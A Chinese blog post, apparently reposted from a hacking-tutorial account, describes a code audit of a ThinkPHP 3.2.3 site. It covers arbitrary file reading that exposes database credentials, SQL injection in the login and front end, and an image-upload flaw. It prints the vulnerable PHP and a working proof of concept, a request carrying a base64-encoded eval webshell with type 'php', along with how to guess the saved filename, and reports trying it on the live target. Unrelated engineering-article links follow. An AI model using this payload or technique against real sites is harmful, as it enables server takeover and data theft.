百度360必应搜狗淘宝本站头条
当前位置:网站首页 > 技术文章 > 正文

代码审计入门 之私密小网站

myzbx 2024-12-12 13:38 31 浏览

欢迎搜索公众号:白帽子左一

每天分享更多黑客技能,工具及体系化视频教程(免费领)

因为自己一直在学习用python编写小工具,然后看到了一些文章关于扫描网站后台备份文件的脚本

我就参照着写了好久的脚本代码,都是低效率代码

然后勉强算是写好了,运行了一下

哎、查看结果还真扫出来了两个包,还是有点用的

好了进入正题:


一、框架分析


解压发现,目录有thinkphp,在tp的基础上进行的二次开发,tp存在的漏洞肯定存在!

(因为一些文件的名字可以找到该模板、所以打码了)

查看一下tp的版本:3.2.3

Tp3.2.3 可能存在缓存漏洞、sql注入漏洞,sql注入暂时放放,缓存漏洞看看有没有。

参考一下:

https://www.bilibili.com/read/cv10345589?from=search

要存在漏洞的话,肯定需要调用tp框架的Cache::set方法,查找全局,看有没有调用。可惜没有调用,那就凉了。

二、网站结构分析


一键开启自动审计!

趁着这个时间大致浏览了一下网站的结构,它没有把全部功能写到controller里面

没有将index.php作为唯一的入口文件,可以访问其他文件进入其他控制器


它采用tp的URL_MODEL=0的模式,index.php对m传参进行清洗

网站如果访问index.php默认访问Home模块的index控制器。

而想进入后台,则要找到入口文件××.php,它的m值为默认Admin、进入admin模块。

所以要进后台,如果××.php没有改变的话,那么访问××.php就可以了。

三、漏洞代码审计

(一)、傻瓜式漏洞


明显的任意文件读取漏洞,而且出错可以报出网站根目录。

这个找到敏感信息便可以读取。


数据库账号密码就来了~

(二)、后台登录sql注入

什么??直接拼接post的值,实锤sql注入,但是不能万能钥匙登录

因为无论如何都要验证加密了的password是否正确,幸运的是这里可以用显错注入


上sqlmap跑一下就可以了。
或者添加一个用户,进入后台搞事情嘻嘻嘻。

这里暂时先不进去,看看前台有什么可以搞的。

(三)、前台sql注入

一堆sql注入,我不一一验证了,各位大佬们肯定能一眼看出来,比如以下:


都没有过滤,而且又没有使用tp的自带函数,那就凉了嘛。


(四)、前台文件上传漏洞

经过不懈的努力,终于找到了一个文件上传的漏洞,这道题有点像ctf,

看来还是要多做点ctf的题呀,多练练思维。

以下为漏洞代码:

    /**
     * 公共上传图片方法
     */
    public function Upload(){
        $base64_image_content = I("post.img");
        $image_name = I("post.name");
        $len = I("post.size");
        $baseLen = strlen($base64_image_content);
        if($len!=$baseLen)  $this->error("上传图片不完整");
        if (preg_match('/^(data:\s*image\/(\w+);base64,)/', $base64_image_content, $result)){
            $uploadFolder  = C('UPLOADPATH').date("Ymd")."/";
            if(!is_dir($uploadFolder)){
                if(!mkdir($uploadFolder, 0755, true)){
                    $this->error('创建文件失败');
                }
            }
            $type = $result[2];
            if(empty($image_name)){
                $new_file = $uploadFolder.date("His")."_".mt_rand(0, 1000).".{$type}";
            }else{
                $new_file = $uploadFolder.$image_name."_".date("mdHis").".{$type}";
            }
            $img_64 = base64_decode(str_replace($result[1], '', $base64_image_content));
            if (file_put_contents($new_file,$img_64)){
                $this->success(complete_url($new_file));
            }
        }else{
            $this->error("图片不存在");
        }
    }
}

由图可知,代码使用tp框架的函数I() 来获取数据,具有一定的安全性,它的函数实现了html实体转化。


但是呢,这里他使用了base64的编码进行输入,所以<>都可以生效。


接下来看一下满足的条件:

1.Size的post传参和$baseLen数据长度一样,也就是size就是img传参的长度。
2.preg_match('/^(data:\s*image\/(\w+);base64,)/', $base64_image_content, $result)//只要输入的img满足data: image/jpg;base64, 就能匹配出三个结果:
3.是否存在目录。(肯定有的~)

代码往下走就是:$type=$result[2];


也就是说type是文件后缀,那让result[2]=php不就完美了?


于是就有:data: image/php;base64



再接着这段代码:


    if(empty($image_name)){
        $new_file = $uploadFolder.date("His")."_".mt_rand(0, 1000).".{$type}";
    }else{
        $new_file = $uploadFolder.$image_name."_".date("mdHis").".{$type}";
    }
    $img_64 = base64_decode(str_replace($result[1], '', $base64_image_content));
    if (file_put_contents($new_file,$img_64)){
        $this->success(complete_url($new_file));
    }
    }else{
        $this->error("图片不存在");
    }

判断有无name传参,有就拼接目录、时间、和$type。其中type为后缀,那就OK,可以上传php文件。


最后看一下file_put_contents两个参数,$new_file 为写入的目录文件,$img_64为写入的内容。内容要是一句话木马才行。


$img_64是先进行替代操作str_replace($result[1], ‘’, $base64_image_content),再进行base64解码。


所以data: image/jpg;base64,之后的内容是一句话木马的base64的加密内容就行。


具体name的传参无关紧要,而size是要等于img的字符长度,即可触发文件上传漏洞。

总结就是,该漏洞因为太相信上传的img文件类型,而触发文件上传漏洞。


综上可得到poc为:


img=data: image/php;base64,PD9waHAgZXZhbCgkX1JFUVVFU1RbMTJdKTs/Pg==& &name=jpg&size=63

PD9waHAgZXZhbCgkX1JFUVVFU1RbMTJdKTs/Pg==是一句话木马base加密的内容。

其中,要连接一句话木马就要知道时间戳。

本地复现:


上传的文件名是jpg_0430130105.php 文件名不难猜,月日时秒
尝试实操:

url为:http://url/index.php?m=&c=indexAjax&a=upload
poc为:

img=data: image/php;base64,PD9waHAgZXZhbCgkX1JFUVVFU1RbMTJdKTs/Pg==&name=jpg&size=63



上传成功,看看效果:


成功。

菜刀就不连了!

开溜是不可能开溜的,后续我还会再尝试一下这个审计一下,若有其他新奇的漏洞代码,我再上传。

心得体会:

我自己通过学习了大约一星期的tp框架,才入门了这个审计

我觉得、不一定自己要有多懂代码、不一定要非得自己写一个网站

但是框架里面的应用包括内置函数这些一定要懂!

这就像一个手机app一样,基本的操作方法会了之后,你就可以找出这个app有哪些小bug。

但是像大佬一样,审计框架里的内容,那可能还有很远的路要走,一起加油吧!

相关推荐

砌体植筋拉拔试验检验值到底是6.0KN,还是10.2KN,如何计算确定

砌体拉结筋植筋养护完成后,需对所植钢筋进行拉拔试验,以检验植筋的锚固强度是否满足设计要求。检测时,按照一定的抽样比例进行拉拔试验。根据《混凝土结构后锚固技术规程》JGJ145-2013,以同品种、同...

柴油机功率如何计算?计算柴油机功率需要哪些参数?

在汽车领域,对于柴油机功率的计算是一项重要的工作,它有助于我们更好地了解柴油机的性能和适用场景。下面我们就来详细探讨一下柴油机功率的计算方法以及所需的参数。首先,我们要了解计算柴油机功率常用的公式。在...

变压器短路阻抗的作用和计算方法(变压器短路阻抗的作用和计算方法是什么)

变压器短路阻抗的作用和计算方法短路阻抗是在负载试验中测量的一项数据,它是二次侧短接并流过额定电流时,一次侧施加的电压与额定电压的的百分数。那么测量变压器的短路阻抗有什么意义呢?其实变压器的阻抗电压乃是...

9.35m层高高支模支撑架计算书(支模架多高属于高支模)

某工厂新扩建的建筑面积为1989.2m^2,建筑物总体分为2层,但局部为4层。建筑物檐高19.4m,建筑物总高23m。建筑物呈长方形设置,长度为48.20m,宽度为23.88m,结构形式为框架结构...

吊篮(悬挂装置前梁加长)安全复核计算书

吊篮(悬挂装置前梁加长)安全复核计算书一种超常规搭设的高处作业吊篮,因使用要求将吊篮悬挂装置前梁加长设置,本计算书针对这种工况的校核,以作参考。计算依据:1、《高处作业吊篮》GB/T19155-...

电功率计算公式精编汇总(电功率计算视频讲解)

一、电功率计算公式:1在纯直流电路中:P=UIP=I2RP=U2/R式中:P---电功率(W),U---电压(V),I----电流(A),R---电阻(Ω)。2在单相交流电路中:P=UIcosφ...

灌注桩承载力检测方法及步骤(灌注桩承载力不够怎么办)

检测灌注桩的承载力是确保基础工程安全可靠的关键环节,检测结果的精细能准确为我们提供可靠的数据,让我们能准确判断桩基础的承载力,方便后续施工安排,同样也能让我们根据数据分辨出有问题桩基,采取可靠有效的措...

很哇塞的体积计算方法:向量叉乘 很哇塞的体积计算方法

高中数学必看:向量叉乘,体积的神。大家都知道a、b的向量是什么意思,但是a、b的向量又是什么?很多同学都不知道,向量的向量在高中阶段非常有用,虽然它是大学的知识,在高中阶段可以干两件事。·第一件事,表...

施工升降机基础(设置在地库顶板回顶)计算书

施工升降机基础(设置在地库顶板回顶)计算书计算依据:1、《施工现场设施安全设计计算手册》谢建民编著2、《建筑地基基础设计规范》GB50007-20113、《混凝土结构设计标准》GB/T50010-2...

剪力墙水平钢筋根数如何计算?(剪力墙水平钢筋绑扎搭接规范)

剪力墙水平钢筋根数的计算需综合考虑墙高、起步距离、间距及构造要求等因素,具体步骤如下及依据:1.基本计算公式水平钢筋根数计算公式为:根数=(墙高-起步距离)/间距(墙高-起步距离)/间距...

直流电路常用计算公式(直流电路常用计算公式有哪些)

1、电阻导体阻碍电流通过的能力叫做电阻,用字母R表示,单位欧(Ω)。R=ρl/s式中R-导体的电阻,欧(Ω);ρ-导体的电阻率,欧·米(Ω·m);l-导体的长度,米(m);s-导体的截面积,平方米(m...

电气主电路图的绘制特点(电气原理图主电路)

1、电气主电路图中的电气设备、元件,如电源进线、变压器、隔离开关、断路器、熔断器、避雷器等都垂直绘制,而母线则水平绘制。电气主电路图除特殊情况外,几乎无一例外地画成单线图,并以母线为核心将各个项目(如...

中考总复习:物理专题 功和机械能 (功的计算、功率、动能、势能)

中考物理专题:功与机械能解析一、力学中的功——能量转化的桥梁功是力对物体能量变化的量度,需满足两要素:作用在物体上的力、物体沿力方向移动距离。例如推箱子时,若箱子未移动,推力不做功;若箱子滑动,推力做...

40亿QQ号,不超过1G内存,如何去重?

分享一道网上很火的面试题:40亿QQ号,不超过1G的内存,如何去重?这是一个非常经典的海量数据去重问题,并且做了内存限制,最多只能1GB,本文跟大家探讨一下~~一、常规思路我们日常开发中,如果谈到去重...

填充墙体拉结筋植筋深度、孔径、拉拔试验承载力计算!

今天分享下植筋间距及保护层要求:根据JGJ145-2013混凝土后锚固技术规程要求植筋与混凝土结构边缘不应小于5mm,植筋为两根及以上时水平间距为不应小于5d(d为钢筋直径)。根据混凝土结构后锚固技...